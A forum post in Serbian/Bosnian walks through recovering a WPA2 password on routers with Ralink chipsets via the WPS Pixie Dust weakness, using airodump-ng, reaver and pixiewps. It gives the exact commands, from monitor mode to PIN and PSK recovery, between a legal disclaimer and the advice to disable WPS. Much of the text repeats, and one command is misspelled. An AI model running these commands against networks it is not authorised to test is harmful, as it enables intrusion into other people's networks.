Testiranje sigurnosti sopstvene WiFi mreže
Napisan post: 07 Jan 2018, 23:58
Napomena:Provaljivanje šifri mreža koje nisu u sopstvenom vlasništvu je kažnjivo zakonom, s toga prije nego što testirate nečiju WiFi mreže tražite odobrenje, za nastalu štetu korišćenjem ovog teksta nisam odgovoran, vozite sigurno
Prije određenog vremena na netu sam naišao na veliki sigurnosni koji se tiče WiFi mreža koje koriste WPA2 sigurnosni protokol pa sam odličio sa vama da podijelim iskustva i kako da se zaštitite.
Radi se o tome da kod rutera koji koriste Ralinkov WiFi čipset moguće je utvrditi trenutni PIN šifre na osnovu nekoliko parametara SEED-a, N1, ES1 i ES2 koje emituje ruter u svakodnevnom radu.
Da bi uspješno testirali tu teoriju na računaru je potrebno da se vrti kernel 4.5+ da imamo instaliran aircrack-ng set alata, reaver 1.6.3 kao i pixiewps 1.4
Prvo je potreno da interfejs wifi kartice prebacimo iz mode-a Managed u mod Monitor
Nakon skeniranja WiFi mreža pomoću airodump-ng wlan0 i utvrđivanja MAC adrese rutera kao i kanala na kom emituje signal potrebno je da pokrenemo
reave -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -K 1 -N -v

gdje je -i interfejs, odnosno wifi kartica, obično je to wlan0, pokrenite komandu iwconfig da utvrdite koji je vaš interfejs
-b <mac adresa> VAŠEG rutera, -c 3 kanal na kom ruter trenutno emituje signal, sa -K 1 pokrećemo "napad" na pomenuti sigurnosni propust, -N znači ne šalji određene pakete i -v je prikazivanje trenutnog stanja
kada dobijemo pin pokrenemo

Šifra nam se nalazi pod PSK
Kako bi se zaštitili potreno je da na ruteru ugasimo WPS

Prije određenog vremena na netu sam naišao na veliki sigurnosni koji se tiče WiFi mreža koje koriste WPA2 sigurnosni protokol pa sam odličio sa vama da podijelim iskustva i kako da se zaštitite.
Radi se o tome da kod rutera koji koriste Ralinkov WiFi čipset moguće je utvrditi trenutni PIN šifre na osnovu nekoliko parametara SEED-a, N1, ES1 i ES2 koje emituje ruter u svakodnevnom radu.
Da bi uspješno testirali tu teoriju na računaru je potrebno da se vrti kernel 4.5+ da imamo instaliran aircrack-ng set alata, reaver 1.6.3 kao i pixiewps 1.4
Prvo je potreno da interfejs wifi kartice prebacimo iz mode-a Managed u mod Monitor
Kod: Označi sve
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig $interface up
reave -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -K 1 -N -v

gdje je -i interfejs, odnosno wifi kartica, obično je to wlan0, pokrenite komandu iwconfig da utvrdite koji je vaš interfejs
Kod: Označi sve
$ iwconfig
enp2s0 no wireless extensions.
lo no wireless extensions.
vmnet1 no wireless extensions.
wlan0 IEEE 802.11bgn Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
vmnet8 no wireless extensions.
kada dobijemo pin pokrenemo
Kod: Označi sve
reaver -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -p 9xxxxxx0 -N -v

Šifra nam se nalazi pod PSK
Kako bi se zaštitili potreno je da na ruteru ugasimo WPS
